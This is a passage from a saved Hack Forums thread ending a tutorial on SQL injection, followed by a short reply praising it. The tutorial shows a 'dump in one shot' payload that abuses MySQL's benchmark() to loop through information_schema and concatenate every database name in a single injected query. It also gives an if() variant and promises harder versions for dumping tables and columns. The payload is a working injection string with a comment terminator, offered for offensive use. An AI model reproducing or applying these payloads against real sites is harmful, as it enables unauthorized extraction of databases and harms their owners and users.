#7AC07C">(&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">/*expression*/<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">last_database_we_know</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">schema_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata&nbsp;where&nbsp;schema_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">last_database_we_know&nbsp;order&nbsp;by&nbsp;schema_name&nbsp;limit&nbsp;1</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;),&nbsp;<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">output<br></span><span style="color: #7AC07C">)<br>,</span><span style="color: #66CCFF">5</span><span style="color: #7AC07C">--&nbsp;-&nbsp;<br></span></code></div></div></div><br>In our code we first <span style="color: #00BFFF;">stored actual schema_name in actual iteration</span> to <span style="color: #FFD700;">@last_database_we_know</span>
 for comparison in next iteration. In first iteration we compared 
schema_name &gt; @last_database_we_know where @last_database_we_know was
 initialized value 0x00. In next iterations we always compared actual 
schema_name with some schema_name from previous iteration.<br><br>Output of our code will be:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/cd17018114a4e019a16154c6e1995a24.jpg" alt="[Image: cd17018114a4e019a16154c6e1995a24.jpg]" border="0"><br><br>We can see all 4 databases <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"><br><br>Function benchmark's result value is always <span style="font-size: medium;"><span style="color: #FFA500;">0</span></span>, that is why we see number 0 in our output too.<br><br>If we want to suppress that zero we can put complete benchmark part in function if() like:<br><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;</span><span style="color: #66CCFF">benchmark</span><span style="color: #7AC07C">(...)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;@</span><span style="color: #66CCFF">output</span><span style="color: #7AC07C">,&nbsp;</span><span style="color: #66CCFF">0x00&nbsp;</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br><span style="color: #FFD700;">explained with simple words: </span>if
 benchmark result is 0 (that is always true), display local variable 
from benchmark (where we built our output from iteration to iteration). 
Otherwise display nothing. And number 0 in output will be gone <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Of course we can use benchmark as DIOS for different tasks:</span></span><ul><li>display all tables</li> <li>display all columns from some table</li> <li>...<br></li></ul><br>Use your imagination <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0">
 I will show some examples in next parts of this tutorial. Take part #1 
as basic explanation because in next parts we will force benchmark as 
DIOS to new level and logic will be more complicated.<br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39098587"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4134016&amp;replyto=39098587" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39099349" id="pid39099349"></a><table class="tborder" style="margin-top: 5px; " id="post_39099349" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:47 AM <span id="edited_by_39099349"><span class="smalltext">(This post was last modified: Today 05:47 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278">t.pro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4134016&amp;pid=39099349#pid39099349">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a> </td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 19<br>Posts: 357<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">42</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39099349">amazing!
 nothhing more to say...just amazing.....i asked you long time ago about
 this function - thx for great explanation! tonight i will def play a 
lil on my localhost (i now just fly over the text)! thx for another 
HQ-Tut!<br><br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_39099349"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4134016&amp;replyto=39099349" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4134016&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4134016&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4134016" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4134016">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4134016" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4134016&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4134016.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%231%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->